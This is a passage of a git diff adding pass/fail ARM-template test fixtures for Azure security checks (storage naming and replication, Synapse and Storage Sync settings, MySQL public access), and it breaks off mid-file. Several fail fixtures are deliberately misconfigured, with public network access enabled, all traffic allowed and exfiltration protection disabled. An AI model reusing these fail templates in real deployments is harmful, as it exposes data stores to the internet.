index 00000000000..dafe40ecd3c
--- /dev/null
+++ b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/pass.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Sql/servers/databases",
+      "apiVersion": "2014-04-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "collation": "SQL_Latin1_General_CP1_CI_AS",
+        "licenseType": "LicenseIncluded",
+        "maxSizeBytes": 4,
+        "readScale": "Enabled",
+        "zoneRedundant": true
+      },
+      "sku": {
+        "name": "S0"
+      },
+      "tags": {
+        "environment": "Production"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_StorageAccountName/camelCase.json b/tests/arm/checks/resource/example_StorageAccountName/camelCase.json
new file mode 100644
index 00000000000..9ca0e623de7
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/camelCase.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2021-04-01",
+      "name": "thisIsWrong",
+      "location": "westeurope",
+      "kind": "StorageV2",
+      "sku": {
+        "name": "Standard_GRS"
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/kebabCase.json b/tests/arm/checks/resource/example_StorageAccountName/kebabCase.json
new file mode 100644
index 00000000000..2fe0ca24f73
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/kebabCase.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2021-04-01",
+      "name": "this-is-wrong",
+      "location": "westeurope",
+      "kind": "StorageV2",
+      "sku": {
+        "name": "Standard_GRS"
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/pass.json b/tests/arm/checks/resource/example_StorageAccountName/pass.json
new file mode 100644
index 00000000000..0b706b15265
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/pass.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2021-04-01",
+      "name": "storageaccountname",
+      "location": "westeurope",
+      "kind": "StorageV2",
+      "sku": {
+        "name": "Standard_GRS",
+        "tier": "Standard"
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/passNumber.json b/tests/arm/checks/resource/example_StorageAccountName/passNumber.json
new file mode 100644
index 00000000000..3f6d62d0776
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/passNumber.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2021-04-01",
+      "name": "1234567890",
+      "location": "westeurope",
+      "kind": "StorageV2",
+      "sku": {
+        "name": "Standard_GRS"
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/tooLong.json b/tests/arm/checks/resource/example_StorageAccountName/tooLong.json
new file mode 100644
index 00000000000..5a293d521fa
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/tooLong.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2021-04-01",
+      "name": "thisiswayyyyyytoooloooong",
+      "location": "westeurope",
+      "kind": "StorageV2",
+      "sku": {
+        "name": "Standard_GRS"
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountsUseReplication/fail.json b/tests/arm/checks/resource/example_StorageAccountsUseReplication/fail.json
new file mode 100644
index 00000000000..248e4d3be5a
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountsUseReplication/fail.json
@@ -0,0 +1,50 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.13.1.58284",
+      "templateHash": "13120038605368246703"
+    }
+  },
+  "parameters": {
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The storage account location."
+      }
+    },
+    "storageAccountName": {
+      "type": "string",
+      "defaultValue": "[format('store{0}', uniqueString(resourceGroup().id))]",
+      "metadata": {
+        "description": "The name of the storage account"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "Standard_LRS"
+      },
+      "kind": "StorageV2",
+      "properties": {}
+    }
+  ],
+  "outputs": {
+    "storageAccountName": {
+      "type": "string",
+      "value": "[parameters('storageAccountName')]"
+    },
+    "storageAccountId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName'))]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountsUseReplication/pass.json b/tests/arm/checks/resource/example_StorageAccountsUseReplication/pass.json
new file mode 100644
index 00000000000..c3946a6630c
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountsUseReplication/pass.json
@@ -0,0 +1,61 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.13.1.58284",
+      "templateHash": "13120038605368246703"
+    }
+  },
+  "parameters": {
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The storage account location."
+      }
+    },
+    "storageAccountName": {
+      "type": "string",
+      "defaultValue": "[format('store{0}', uniqueString(resourceGroup().id))]",
+      "metadata": {
+        "description": "The name of the storage account"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "Standard_GRS"
+      },
+      "kind": "StorageV2",
+      "properties": {}
+    },
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2022-09-01",
+      "name": "pass2",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "Standard_RAGRS"
+      },
+      "kind": "StorageV2",
+      "properties": {}
+    }
+  ],
+  "outputs": {
+    "storageAccountName": {
+      "type": "string",
+      "value": "[parameters('storageAccountName')]"
+    },
+    "storageAccountId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName'))]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json
new file mode 100644
index 00000000000..b42eb25b0b6
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json
@@ -0,0 +1,23 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.StorageSync/storageSyncServices",
+      "apiVersion": "2021-02-01",
+      "name": "fail1",
+      "properties": {
+        "storageSyncServiceStatus": "Registered",
+        "storageSyncServiceProperties": {
+          "trustState": "Enabled",
+          "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+          "provisioningState": "Succeeded"
+        },
+        "location": "East US",
+        "tags": {
+          "foo": "bar"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json
new file mode 100644
index 00000000000..07ca8e384a8
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json
@@ -0,0 +1,24 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.StorageSync/storageSyncServices",
+      "apiVersion": "2021-02-01",
+      "name": "fail2",
+      "properties": {
+        "storageSyncServiceStatus": "Registered",
+        "storageSyncServiceProperties": {
+          "trustState": "Enabled",
+          "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+          "provisioningState": "Succeeded"
+        },
+        "location": "East US",
+        "incomingTrafficPolicy": "AllowAllTraffic",
+        "tags": {
+          "foo": "bar"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json
new file mode 100644
index 00000000000..ade615191c3
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json
@@ -0,0 +1,24 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "properties": {
+        "storageSyncServiceStatus": "Registered",
+        "storageSyncServiceProperties": {
+          "trustState": "Enabled",
+          "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+          "provisioningState": "Succeeded"
+        },
+        "location": "East US",
+        "incomingTrafficPolicy": "AllowVirtualNetworksOnly",
+        "tags": {
+          "foo": "bar"
+        }
+      },
+      "type": "Microsoft.StorageSync/storageSyncServices"
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/fail.json b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/fail.json
new file mode 100644
index 00000000000..43cc4ec43b4
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/fail.json
@@ -0,0 +1,60 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-06-01",
+      "name": "[parameters('workspaceName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "defaultDataLakeStorage": {
+          "accountUrl": "[parameters('storageAccountUrl')]",
+          "filesystem": "[parameters('filesystem')]"
+        },
+        "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]",
+        "sqlAdministratorLoginPassword": {
+          "value": "[parameters('sqlAdministratorLoginPassword')]"
+        }
+      }
+    }
+  ],
+  "parameters": {
+    "workspaceName": {
+      "type": "string",
+      "metadata": {
+        "description": "Name of the Synapse workspace"
+      }
+    },
+    "location": {
+      "type": "string",
+      "metadata": {
+        "description": "Location for the Synapse workspace"
+      }
+    },
+    "storageAccountUrl": {
+      "type": "string",
+      "metadata": {
+        "description": "URL of the default Data Lake Storage account"
+      }
+    },
+    "filesystem": {
+      "type": "string",
+      "metadata": {
+        "description": "Filesystem name in the Data Lake Storage account"
+      }
+    },
+    "sqlAdministratorLogin": {
+      "type": "string",
+      "metadata": {
+        "description": "SQL administrator login name"
+      }
+    },
+    "sqlAdministratorLoginPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "SQL administrator login password"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/pass.json b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/pass.json
new file mode 100644
index 00000000000..7e81744ff21
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/pass.json
@@ -0,0 +1,51 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+      {
+        "type": "Microsoft.Synapse/workspaces",
+        "apiVersion": "2021-06-01",
+        "name": "[parameters('workspaceName')]",
+        "location": "[parameters('location')]",
+        "properties": {
+          "defaultDataLakeStorage": {
+            "accountUrl": "[parameters('storageAccountUrl')]",
+            "filesystem": "[parameters('filesystem')]"
+          },
+          "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]"
+        }
+      }
+    ],
+    "parameters": {
+      "workspaceName": {
+        "type": "string",
+        "metadata": {
+          "description": "Name of the Synapse workspace"
+        }
+      },
+      "location": {
+        "type": "string",
+        "metadata": {
+          "description": "Location for the Synapse workspace"
+        }
+      },
+      "storageAccountUrl": {
+        "type": "string",
+        "metadata": {
+          "description": "URL of the default Data Lake Storage account"
+        }
+      },
+      "filesystem": {
+        "type": "string",
+        "metadata": {
+          "description": "Filesystem name in the Data Lake Storage account"
+        }
+      },
+      "sqlAdministratorLogin": {
+        "type": "string",
+        "metadata": {
+          "description": "SQL administrator login name"
+        }
+      }
+    }
+  }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/fail.json b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/fail.json
new file mode 100644
index 00000000000..de321703226
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/fail.json
@@ -0,0 +1,68 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-06-01",
+      "name": "[parameters('workspaceName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "defaultDataLakeStorage": {
+          "accountUrl": "[parameters('storageAccountUrl')]",
+          "filesystem": "[parameters('fileSystem')]"
+        },
+        "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]",
+        "sqlAdministratorLoginPassword": {
+          "value": "[parameters('sqlAdministratorLoginPassword')]"
+        },
+        "managedVirtualNetwork": "[parameters('managedVirtualNetwork')]"
+      }
+    }
+  ],
+  "parameters": {
+    "workspaceName": {
+      "type": "string",
+      "metadata": {
+        "description": "Name of the Synapse workspace."
+      }
+    },
+    "location": {
+      "type": "string",
+      "metadata": {
+        "description": "Location of the Synapse workspace."
+      }
+    },
+    "storageAccountUrl": {
+      "type": "string",
+      "metadata": {
+        "description": "URL of the default Data Lake Storage account."
+      }
+    },
+    "fileSystem": {
+      "type": "string",
+      "metadata": {
+        "description": "File system name of the default Data Lake Storage account."
+      }
+    },
+    "sqlAdministratorLogin": {
+      "type": "string",
+      "metadata": {
+        "description": "SQL administrator login name."
+      }
+    },
+    "sqlAdministratorLoginPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "SQL administrator login password."
+      }
+    },
+    "managedVirtualNetwork": {
+      "type": "string",
+      "defaultValue": "default",
+      "metadata": {
+        "description": "Managed Virtual Network name."
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/pass.json b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/pass.json
new file mode 100644
index 00000000000..0427c914271
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/pass.json
@@ -0,0 +1,103 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-06-01",
+      "name": "[parameters('workspaceName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "defaultDataLakeStorage": {
+          "accountUrl": "[parameters('storageAccountUrl')]",
+          "filesystem": "[parameters('fileSystem')]"
+        },
+        "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]",
+        "sqlAdministratorLoginPassword": {
+          "value": "[parameters('sqlAdministratorLoginPassword')]"
+        },
+        "managedVirtualNetwork": "[parameters('managedVirtualNetwork')]",
+        "encryption": {
+          "cmk": {
+            "key": {
+              "name": "[parameters('keyName')]",
+              "vaultBaseUrl": "[parameters('keyVaultUrl')]"
+            },
+            "identity": {
+              "userAssignedIdentity": "[parameters('userAssignedIdentityResourceId')]"
+            }
+          }
+        }
+      },
+      "identity": {
+        "type": "UserAssigned",
+        "userAssignedIdentities": {
+          "[parameters('userAssignedIdentityResourceId')]": {}
+        }
+      }
+    }
+  ],
+  "parameters": {
+    "workspaceName": {
+      "type": "string",
+      "metadata": {
+        "description": "Name of the Synapse workspace."
+      }
+    },
+    "location": {
+      "type": "string",
+      "metadata": {
+        "description": "Location of the Synapse workspace."
+      }
+    },
+    "storageAccountUrl": {
+      "type": "string",
+      "metadata": {
+        "description": "URL of the default Data Lake Storage account."
+      }
+    },
+    "fileSystem": {
+      "type": "string",
+      "metadata": {
+        "description": "File system name of the default Data Lake Storage account."
+      }
+    },
+    "sqlAdministratorLogin": {
+      "type": "string",
+      "metadata": {
+        "description": "SQL administrator login name."
+      }
+    },
+    "sqlAdministratorLoginPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "SQL administrator login password."
+      }
+    },
+    "managedVirtualNetwork": {
+      "type": "string",
+      "defaultValue": "default",
+      "metadata": {
+        "description": "Managed Virtual Network name."
+      }
+    },
+    "keyName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the customer-managed key."
+      }
+    },
+    "keyVaultUrl": {
+      "type": "string",
+      "metadata": {
+        "description": "The URL of the Key Vault containing the customer-managed key."
+      }
+    },
+    "userAssignedIdentityResourceId": {
+      "type": "string",
+      "metadata": {
+        "description": "The resource ID of the user-assigned managed identity."
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail1.json b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail1.json
new file mode 100644
index 00000000000..dfe817dffc3
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail1.json
@@ -0,0 +1,17 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-02-01",
+      "name": "fail1",
+      "location": "East US",
+      "properties": {
+        "dataExfiltrationProtectionEnabled" : "false",
+        "tags": {
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail2.json b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail2.json
new file mode 100644
index 00000000000..eba713c6154
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail2.json
@@ -0,0 +1,17 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-02-01",
+      "name": "fail2",
+      "location": "East US",
+      "properties": {
+        "tags": {
+        }
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/pass.json b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/pass.json
new file mode 100644
index 00000000000..dd4e580bbdf
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/pass.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "East US",
+      "properties": {
+        "dataExfiltrationProtectionEnabled": true,
+        "tags": {
+        }
+      }
+    }
+  ]
+}
+
+
diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json
new file mode 100644
index 00000000000..2f14c053353
--- /dev/null
+++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json
@@ -0,0 +1,250 @@
+{
+    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "apiVersion": {
+            "type": "string",
+            "defaultValue": "2021-05-01"
+        },
+        "administratorLogin": {
+            "type": "string"
+        },
+        "administratorLoginPassword": {
+            "type": "securestring"
+        },
+        "location": {
+            "type": "string"
+        },
+        "serverName": {
+            "type": "string"
+        },
+        "serverEdition": {
+            "type": "string"
+        },
+        "vCores": {
+            "type": "int",
+            "defaultValue": 4
+        },
+        "storageSizeGB": {
+            "type": "int"
+        },
+        "haEnabled": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "availabilityZone": {
+            "type": "string",
+            "defaultValue": ""
+        },
+        "standbyAvailabilityZone": {
+            "type": "string"
+        },
+        "version": {
+            "type": "string"
+        },
+        "tags": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRules": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "backupRetentionDays": {
+            "type": "int"
+        },
+        "geoRedundantBackup": {
+            "type": "string",
+            "defaultValue": true
+        },
+        "vmName": {
+            "type": "string",
+            "defaultValue": "Standard_B1ms"
+        },
+        "storageIops": {
+            "type": "int"
+        },
+        "storageAutogrow": {
+            "type": "string",
+            "defaultValue": "Enabled"
+        },
+        "autoIoScaling": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "identityData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "dataEncryptionData": {
+            "type": "object",
+            "defaultValue": {
+                "type": "AzureKeyVault",
+                "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike",
+                "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2"
+            }
+        },
+        "serverParameters": {
+            "type": "array",
+            "defaultValue": []
+        },
+        "aadEnabled": {
+            "type": "bool",
+            "defaultValue": false
+        },
+        "aadData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "guid": {
+            "type": "string",
+            "defaultValue": "[newGuid()]"
+        },
+        "network": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRulesAPIVersion": {
+            "type": "string",
+            "defaultValue": "2022-01-01"
+        }
+    },
+    "variables": {
+        "api": "[parameters('apiVersion')]",
+        "firewallRules": "[parameters('firewallRules').rules]",
+        "serverParameters": "[parameters('serverParameters')]"
+    },
+    "resources": [
+        {
+          "type": "Microsoft.DBforMySQL/servers",
+          "apiVersion": "2017-12-01",
+          "name": "fail",
+          "location": "string",
+          "tags": {
+            "tagName1": "tagValue1",
+            "tagName2": "tagValue2"
+          },
+            "{customized property}": "string",
+          "sku": {
+            "capacity": "int",
+            "family": "string",
+            "name": "string",
+            "size": "string",
+            "tier": "string"
+          },
+          "identity": {
+            "type": "SystemAssigned"
+          },
+          "properties": {
+            "infrastructureEncryption": "string",
+            "minimalTlsVersion": "string",
+            "publicNetworkAccess": "enabled",
+            "sslEnforcement": "string",
+            "storageProfile": {
+              "backupRetentionDays": "int",
+              "geoRedundantBackup": "string",
+              "storageAutogrow": "string",
+              "storageMB": "int"
+            },
+            "version": "string",
+            "createMode": "string"
+          }
+                },
+        {
+            "condition": "[greater(length(variables('firewallRules')), 0)]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]",
+            "copy": {
+                "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]",
+                "mode": "Serial",
+                "name": "firewallRulesIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules",
+                            "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]",
+                            "apiVersion": "[parameters('firewallRulesAPIVersion')]",
+                            "properties": {
+                                "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]",
+                                "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[parameters('aadEnabled')]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('addAdmins-', parameters('guid'))]",
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/administrators",
+                            "name": "[concat(parameters('serverName'),'/ActiveDirectory')]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "administratorType": "[parameters('aadData').administratorType]",
+                                "identityResourceId": "[parameters('aadData').identityResourceId]",
+                                "login": "[parameters('aadData').login]",
+                                "sid": "[parameters('aadData').sid]",
+                                "tenantId": "[parameters('aadData').tenantId]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "copy": {
+                "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]",
+                "mode": "serial",
+                "name": "serverParametersIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]",
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/configurations",
+                            "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "value": "[variables('serverParameters')[copyIndex()].value]",
+                                "source": "[variables('serverParameters')[copyIndex()].source]"
+                            }
+                        }
+                    ]
+                }
+            }
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json
new file mode 100644
index 00000000000..74538468f41
--- /dev/null
+++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json
@@ -0,0 +1,250 @@
+{
+    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "apiVersion": {
+            "type": "string",
+            "defaultValue": "2021-05-01"
+        },
+        "administratorLogin": {
+            "type": "string"
+        },
+        "administratorLoginPassword": {
+            "type": "securestring"
+        },
+        "location": {
+            "type": "string"
+        },
+        "serverName": {
+            "type": "string"
+        },
+        "serverEdition": {
+            "type": "string"
+        },
+        "vCores": {
+            "type": "int",
+            "defaultValue": 4
+        },
+        "storageSizeGB": {
+            "type": "int"
+        },
+        "haEnabled": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "availabilityZone": {
+            "type": "string",
+            "defaultValue": ""
+        },
+        "standbyAvailabilityZone": {
+            "type": "string"
+        },
+        "version": {
+            "type": "string"
+        },
+        "tags": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRules": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "backupRetentionDays": {
+            "type": "int"
+        },
+        "geoRedundantBackup": {
+            "type": "string",
+            "defaultValue": true
+        },
+        "vmName": {
+            "type": "string",
+            "defaultValue": "Standard_B1ms"
+        },
+        "storageIops": {
+            "type": "int"
+        },
+        "storageAutogrow": {
+            "type": "string",
